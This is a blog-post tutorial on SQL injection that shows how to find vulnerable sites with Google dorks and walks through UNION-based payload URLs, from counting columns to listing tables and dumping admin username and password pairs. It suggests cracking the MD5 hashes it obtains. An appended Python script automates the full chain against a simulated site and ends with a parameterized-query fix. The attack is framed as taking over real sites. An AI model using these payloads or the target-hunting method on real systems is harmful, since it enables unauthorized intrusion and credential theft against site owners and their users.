Monday, May 16, 2011

SQL INJECTION - TUTORIAL



Finding the vulnerability:
First of all we need a vulnerable site.

To find one, open Google

Type in a dork like "inurl:index.php?id=" (without the quotes)


Now click on any site like http://www.site.com/index.php?id=786

To test whether the site is vulnerable, add a ' at the end of the URL, so it becomes http://www.site.com/index.php?id=786'

If the page comes back with a database error like

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"

the id parameter is being pasted straight into the query, and the site is very likely vulnerable: the stray quote broke the SQL statement and the application printed the database's complaint instead of handling it. The reverse does not hold, though. A page that swallows errors or returns a generic page can still be injectable (blind injection); it is just harder to spot.
Checking the number of columns:
To find out how many columns the original query selects, we add an ORDER BY with an increasing column position:

http://www.site.com/index.php?id=-786 order by 1-- if the page loads normally without any error we proceed
http://www.site.com/index.php?id=-786 order by 2-- (no error)
similarly check
http://www.site.com/index.php?id=-786 order by 3--
http://www.site.com/index.php?id=-786 order by 4--
http://www.site.com/index.php?id=-786 order by 5--
http://www.site.com/index.php?id=-786 order by 6-- => error

If we get an error at 6 like "Unknown column '6' in 'order clause'", the query has exactly 5 columns. We need this count because a UNION only works when both SELECTs return the same number of columns.

A note on the comment at the end: MySQL only treats -- as a comment when whitespace follows it, and browsers drop a trailing space from the URL, so in practice write --+ or -- - (or use #, which has to be URL-encoded as %23) to make sure the rest of the original query is ignored.
Finding the vulnerable columns:
To find which columns are displayed on the page we add union all select 1,2,3,4,5-- after http://www.site.com/index.php?id=-786 (one number for each column we counted).

Now the URL becomes

http://www.site.com/index.php?id=-786 union all select 1,2,3,4,5--

The id is made negative (-786) so that the original query matches no row and the page renders the row our UNION supplies instead. If, after hitting enter, we see some of the numbers, say 2 and 4, somewhere on the page, then columns 2 and 4 are displayed and data can be retrieved through columns 2 and 4.

Finding the MySQL version:
To find the version we replace 2 or 4 with @@version (version() works as well).
Now the URL looks like

http://www.site.com/index.php?id=-786 union all select 1,@@version,3,4,5--

After hitting enter the version appears on the page where the 2 was.

Let's assume we got 5.0.90-community-log, which is the MySQL version. The version matters: the information_schema database used in the next steps only exists from MySQL 5.0 onwards; on 4.x the table names have to be guessed instead.
Getting table names:
To get table names, remove @@version from the URL and replace it with table_name, reading from information_schema.tables.

The URL now becomes

http://www.site.com/index.php?id=-786 union all select 1,table_name,3,4,5 from information_schema.tables--

After hitting enter the page shows a table name. Because the page renders a single row, this only gives the first table, which is usually one of information_schema's own tables. Use group_concat(table_name) in place of table_name to get all of them in one row, and append where table_schema=database() so the listing is restricted to the site's own database.

Let us assume we got something like this

comment,log,admin,news,news_comment,members.

To take over the site, the data should be retrieved from the admin table.
Getting the column names:
To get the column names from the table admin we do the following

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii codes of the tablename)--

(As before, group_concat(column_name) returns every column in one row.)
Converting the tablename to ASCII:
The table name is written with char() instead of a quoted string because many sites escape quotes (magic_quotes or addslashes), which would break a payload containing 'admin'. char() takes the ASCII codes of the characters.

Convert the tablename to ASCII here

http://www.getyourwebsitehere.com/jswb/t...ascii.html

The codes generated for the table name admin are &#97;&#100;&#109;&#105;&#110;

Now remove the &# and put a , between them

So now it is 97,100,109,105,110

(A hex literal works just as well in MySQL: 0x61646d696e is 'admin'.)

Replace it in the place of the ASCII codes of the tablename

Now it is

http://www.site.com/index.php?id=-786 union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)--

You can now see something like

username pwd gender email on the page
Getting username and password:
To get the username and password we use

http://www.site.com/index.php?id=-786 union all select 1,concat(username,0x3a,pwd),3,4,5 from admin-- and hit enter.

0x3a is a colon, so the result appears as username:password. At this point we see the username and password on the page; group_concat(concat(username,0x3a,pwd)) shows every account at once instead of only the first row.

On some websites the passwords are stored as MD5 hashes rather than in plain text. MD5 is a hash, not encryption, so it cannot be decrypted; the hash has to be looked up in a precomputed table or cracked, for example at http://www.md5decrypter.co.uk
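The whole chain above, as an added worked example that is not part of the original tutorial: a Python script that simulates the injectable index.php with SQLite standing in for MySQL, runs the steps against it (count columns with ORDER BY, find the reflected columns with UNION markers, pull the version, the tables, the admin columns and the username:password pairs), and shows the same page fixed with a bound parameter. Everything about the target is constructed: the site, the five-column news table, the admin row and its MD5 hash. sqlite_version(), sqlite_master and pragma_table_info replace @@version, information_schema.tables and information_schema.columns, and || replaces concat(); char_literal() and hex_literal() produce the quote-free literals from the char() section, so the ASCII conversion website is not needed.

```python
import sqlite3

# Constructed stand-in for the tutorial's target (not a real site): SQLite instead of MySQL,
# a five-column news table behind index.php?id=..., and an admin table holding an MD5 hash
# (5f4dcc3b5aa765d61d8327deb882cf99 is md5("password")).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, author TEXT, body TEXT, posted TEXT);
        INSERT INTO news VALUES (786, 'Site news', 'editor', 'Welcome to the site', '2011-05-16');
        CREATE TABLE admin(username TEXT, pwd TEXT, gender TEXT, email TEXT);
        INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'm', 'admin@site.com');
    """)
    return conn

def vulnerable_page(conn, id_param):
    """Models the injectable index.php: id is glued into the SQL, the raw database error is
    echoed, and only columns 2 (title) and 4 (body) are rendered, so only they reflect."""
    sql = "SELECT id, title, author, body, posted FROM news WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "Error: " + str(exc)
    if row is None:
        return "No such article"
    return f"<h1>{row[1]}</h1><p>{row[3]}</p>"

def safe_page(conn, id_param):
    """The same page with a bound parameter: the input is compared as a value, never parsed as SQL."""
    row = conn.execute("SELECT id, title, author, body, posted FROM news WHERE id=?",
                       (id_param,)).fetchone()
    if row is None:
        return "No such article"
    return f"<h1>{row[1]}</h1><p>{row[3]}</p>"

def count_columns(page, max_cols=32):
    """ORDER BY n until the database objects; the last n that loads cleanly is the column count."""
    for n in range(1, max_cols + 1):
        if page(f"-786 ORDER BY {n}--").startswith("Error"):
            return n - 1
    return None

def find_reflected_columns(page, ncols):
    """UNION a row of distinctive markers and see which come back. Plain 1..5 would give false
    hits against page text such as '<h1>', so use values that cannot occur by accident."""
    markers = [str(100000 + i) for i in range(1, ncols + 1)]
    html = page(f"-786 UNION ALL SELECT {','.join(markers)}--")
    return [i for i, marker in enumerate(markers, 1) if marker in html]

def char_literal(text):
    """Quote-free string literal: 'admin' -> char(97,100,109,105,110). Same syntax in MySQL and SQLite."""
    return "char(" + ",".join(str(ord(c)) for c in text) + ")"

def hex_literal(text):
    """MySQL's other quote-free form: 'admin' -> 0x61646d696e."""
    return "0x" + text.encode().hex()

def extract(page, expression, from_clause="", ncols=5, column=2):
    """Put one expression into a reflected column of the UNION row and read it back out of the
    <h1>, which is where this page renders its first reflected column."""
    cells = [str(i) for i in range(1, ncols + 1)]
    cells[column - 1] = expression
    html = page(f"-786 UNION ALL SELECT {','.join(cells)}{from_clause}--")
    start = html.index("<h1>") + len("<h1>")
    return html[start:html.index("</h1>")]

def run_chain(page):
    """The tutorial's steps end to end. group_concat folds every row into the single row the page
    shows; the comments give the MySQL equivalent of each SQLite-specific piece."""
    ncols = count_columns(page)
    reflected = find_reflected_columns(page, ncols)
    col = reflected[0]
    version = extract(page, "sqlite_version()", ncols=ncols, column=col)      # @@version
    tables = extract(page, "group_concat(name)",                               # information_schema.tables
                     f" FROM sqlite_master WHERE type={char_literal('table')}", ncols, col)
    columns = extract(page, "group_concat(p.name)",                            # information_schema.columns
                      f" FROM sqlite_master m JOIN pragma_table_info(m.name) p"
                      f" WHERE m.name={char_literal('admin')}", ncols, col)
    creds = extract(page, "group_concat(username||char(58)||pwd)",             # concat(username,0x3a,pwd)
                    " FROM admin", ncols, col)
    return {"columns": ncols, "reflected": reflected, "version": version,
            "tables": tables, "admin_columns": columns, "creds": creds}

def run_demo():
    conn = build_db()
    return run_chain(lambda id_param: vulnerable_page(conn, id_param))

if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
    # The fixed page ignores the same payload: it is just an id that matches nothing.
    print(safe_page(build_db(), "-786 UNION ALL SELECT 1,2,3,4,5--"))
```

Run it with python3 and the vulnerable page gives up 5 columns, reflected columns 2 and 4, the tables, the admin columns and admin:5f4dcc3b5aa765d61d8327deb882cf99, while safe_page returns "No such article" for the very same payload, because with a bound parameter the whole string is compared against id as a value. Parameterized queries are the fix; escaping quotes only blocks the quoted payloads, which is exactly why the char() and 0x... forms exist.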
